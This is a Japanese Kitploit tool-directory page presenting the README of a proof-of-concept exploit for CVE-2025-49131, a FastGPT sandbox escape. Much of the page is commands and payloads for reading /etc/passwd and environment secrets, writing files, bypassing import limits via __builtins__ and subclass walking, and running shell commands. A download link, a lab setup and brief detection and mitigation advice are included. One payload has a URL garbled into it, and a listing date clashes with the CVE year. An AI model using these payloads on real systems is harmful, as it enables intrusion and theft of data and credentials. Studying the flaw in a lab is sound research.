Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2025-49131-poc — CVE-2025-49131の概念実証エクスプロイト。FastGPTのサンドボックスエスケープであり、サンドボックスAPIを介した任意のファイル読み取り/書き込み、インポートバイパス、およびリモートコード実行を可能にします。 | Kitploit
ツール/GitHubGitHub/wenura17125/cve-2025-49131-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育リモートアクセスツールコンテナエスケープ
GitHubwenura17125/cve-2025-49131-poc

cve-2025-49131-poc

CVE-2025-49131の概念実証エクスプロイト。FastGPTのサンドボックスエスケープであり、サンドボックスAPIを介した任意のファイル読み取り/書き込み、インポートバイパス、およびリモートコード実行を可能にします。

リポジトリを見る
88ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-49131 - FastGPT サンドボックスエスケープ POC

root@kitploit:~
 ███████╗ █████╗ ███████╗████████╗ ██████╗ ██████╗ ████████╗
 ██╔════╝██╔══██╗██╔════╝╚══██╔══╝██╔════╝ ██╔══██╗╚══██╔══╝
 █████╗  ███████║███████╗   ██║   ██║  ███╗██████╔╝   ██║   
 ██╔══╝  ██╔══██║╚════██║   ██║   ██║   ██║██╔═══╝    ██║   
 ██║     ██║  ██║███████║   ██║   ╚██████╔╝██║        ██║   
 ╚═╝     ╚═╝  ╚═╝╚══════╝   ╚═╝    ╚═════╝ ╚═╝        ╚═╝   
                                                            
 ███████╗ █████╗ ███╗   ██╗██████╗ ██████╗  ██████╗ ██╗  ██╗
 ██╔════╝██╔══██╗████╗  ██║██╔══██╗██╔══██╗██╔═══██╗╚██╗██╔╝
 ███████╗███████║██╔██╗ ██║██║  ██║██████╔╝██║   ██║ ╚███╔╝ 
 ╚════██║██╔══██║██║╚██╗██║██║  ██║██╔══██╗██║   ██║ ██╔██╗ 
 ███████║██║  ██║██║ ╚████║██████╔╝██████╔╝╚██████╔╝██╔╝ ██╗
 ╚══════╝╚═╝  ╚═╝╚═╝  ╚═══╝╚═════╝ ╚═════╝  ╚═════╝ ╚═╝  ╚═╝
                                                            
 ███████╗███████╗ ██████╗ █████╗ ██████╗ ███████╗           
 ██╔════╝██╔════╝██╔════╝██╔══██╗██╔══██╗██╔════╝           
 █████╗  ███████╗██║     ███████║██████╔╝█████╗             
 ██╔══╝  ╚════██║██║     ██╔══██║██╔═══╝ ██╔══╝             
 ███████╗███████║╚██████╗██║  ██║██║     ███████╗           
 ╚══════╝╚══════╝ ╚═════╝╚═╝  ╚═╝╚═╝     ╚══════╝           
                                                            
        ╔═══════════════════════════════════════╗
        ║     CVE-2025-49131 | CVSS 6.3        ║
        ║   FastGPT サンドボックスコンテナエスケープ   ║
        ║      影響を受けるバージョン: < v4.9.11             ║
        ╚═══════════════════════════════════════╝

🎯 脆弱性概要

フィールド値
CVE IDCVE-2025-49131
CVSS スコア6.3 (Medium)
CVSS ベクターAV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
脆弱性タイプサンドボックスエスケープ
影響を受けるソフトウェアFastGPT (fastgpt-sandbox コンテナ)
影響を受けるバージョン< 4.9.11
修正バージョン4.9.11+
開示日2025年6月9日

⚠️ 免責事項

このツールは、許可されたセキュリティ研究および教育目的のみに使用されます。

  • 所有しているシステム、または明示的な書面による許可を得たシステムでのみテストしてください
  • 責任ある開示の慣行に従ってください
  • すべての該当する法律および規制を遵守してください

📖 説明

CVE-2025-49131 は、FastGPT の fastgpt-sandbox コンテナにおけるサンドボックスエスケープの脆弱性です。この脆弱性は以下の理由で存在します:

  • 不十分な分離メカニズム - サンドボックスが Python の組み込み機能を適切に制限できていません
  • 過度に寛容なシステムコール - 危険なシステムコールがブロックされていません
  • 不十分なコード実行制限 - インポート制限が回避可能です

影響

悪用に成功すると、攻撃者は以下を実行できます:

  • ✅ 任意のファイルの読み取り - /etc/passwd、設定ファイル、シークレットにアクセス
  • ✅ 任意のファイルの書き込み - システムファイルの変更、悪意のあるコードの注入
  • ✅ Python インポート制限の回避 - os、subprocess モジュールのインポート
  • ✅ 潜在的な RCE - インポートしたモジュールを介したシステムコマンドの実行

🚀 クイックスタート

root@kitploit:~
# このリポジトリをクローン
git clone https://github.com/Wenura17125/cve-2025-49131-poc.git
cd cve-2025-49131-poc

# 依存関係をインストール
pip install -r requirements.txt

# 脆弱性検出を実行
python poc.py --target http://localhost:3001 --detect

# ファイルを読み取り
python poc.py --target http://localhost:3001 --read /etc/passwd

# RCE を試行
python poc.py --target http://localhost:3001 --rce "id"

🔧 脆弱な環境のセットアップ

root@kitploit:~
# 脆弱なコンテナと修正済みコンテナを起動
docker-compose up -d

# 脆弱なサンドボックス: ポート 3001
# 修正済みサンドボックス: ポート 3002

💻 使用方法

検出モード (非破壊)

root@kitploit:~
python poc.py --target http://localhost:3001 --detect -v

任意のファイル読み取り

root@kitploit:~
python poc.py --target http://localhost:3001 --read /etc/passwd
python poc.py --target http://localhost:3001 --read /proc/self/environ

ファイル書き込み

root@kitploit:~
python poc.py --target http://localhost:3001 --write /tmp/pwned --content "CVE-2025-49131"

インポート回避

root@kitploit:~
python poc.py --target http://localhost:3001 --import os
python poc.py --target http://localhost:3001 --import subprocess

環境変数

root@kitploit:~
python poc.py --target http://localhost:3001 --env

リモートコード実行

root@kitploit:~
python poc.py --target http://localhost:3001 --rce "whoami"
python poc.py --target http://localhost:3001 --rce "cat /etc/passwd"

全オプション

root@kitploit:~
python poc.py --help

📁 プロジェクト構成

root@kitploit:~
cve-2025-49131-poc/
├── poc.py                # メインのエクスプロイトスクリプト
├── payloads.py           # ペイロード生成ライブラリ
├── docker-compose.yml    # テスト環境
├── requirements.txt      # Python 依存関係
├── README.md             # このファイル
└── tests/
    └── test_exploit.py   # 自動テスト

🔬 技術詳細

脆弱性の根本原因

FastGPT サンドボックスは、ユーザーが送信したコードを隔離環境で実行するように設計されています。しかし、分離メカニズムは不十分です:

  1. Python __builtins__ へのアクセス - サンドボックスは open()、__import__() などの組み込み関数へのアクセスを適切に制限していません。

  2. システムコールフィルタリング - 許可されるシステムコールリストには、ファイルシステムアクセスを可能にする危険な呼び出しが含まれています。

  3. インポート制限の回避 - モジュールインポート制限を回避するための複数の手法が存在します。

エクスプロイトの流れ

root@kitploit:~
┌─────────────────────────────────────────────┐
│ 1. 悪意のあるコードをサンドボックス API に送信   │
└─────────────────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────┐
│ 2. 以下を使用してサンドボックス制限を回避:     │
│    - __builtins__ の操作                     │
│    - サブクラスウォーキング                    │
│    - インポート回避手法                       │
└─────────────────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────┐
│ 3. 以下へのアクセスを取得:                    │
│    - ファイルシステム (読み取り/書き込み)       │
│    - os/subprocess モジュール                 │
│    - 環境変数                                │
└─────────────────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────┐
│ 4. 影響:                                    │
│    - データ流出                              │
│    - コード注入                              │
│    - リモートコマンド実行                     │
└─────────────────────────────────────────────┘

ペイロード例

ファイル読み取り:

root@kitploit:~
open('/etc/passwd', 'r').read()
__builtins__.open('/etc/passwd').read()

インポート回避:

root@kitploit:~
__import__('os')
__builtins__.__import__('os')
[x for x in ().__class__.__base__.__subclasses__() 
 if x.__name__=='catch_warnings'][0]()._module.__builtins__['__import__'](https://github.com/wenura17125/cve-2025-49131-poc/blob/main/%27os%27)

RCE:

root@kitploit:~
__import__('os').popen('id').read()
__import__('subprocess').check_output('id', shell=True)

🛡️ 検出と緩和策

検出

サンドボックスログで不審なアクティビティを監視:

  • /etc/passwd、/etc/shadow へのアクセス試行
  • __builtins__、__import__ への呼び出し
  • subprocess または os モジュールの使用
  • 異常なファイル読み取り/書き込み操作

緩和策

  1. FastGPT のアップグレード - バージョン 4.9.11 以降に更新
  2. ネットワーク分離 - サンドボックスコンテナのネットワークアクセスを制限
  3. リソース制限 - コンテナに CPU/メモリ制限を適用
  4. 監視 - サンドボックスアクティビティのログ記録とアラートを実装

📚 参考情報

  • NVD - CVE-2025-49131
  • FastGPT GitHub
  • GitHub Security Advisory
  • FastGPT ドキュメント

⏱️ タイムライン

日付イベント
2025-??-??脆弱性発見
2025-??-??ベンダーに通知
2025-06-??パッチリリース (v4.9.11)
2025-06-09一般公開

📄 ライセンス

このプロジェクトは教育および許可されたセキュリティ研究目的にのみ使用されます。責任を持って使用してください。


セキュリティ研究目的で作成されました。テストを実施する前に、必ず適切な許可を取得してください。

ツールをダウンロード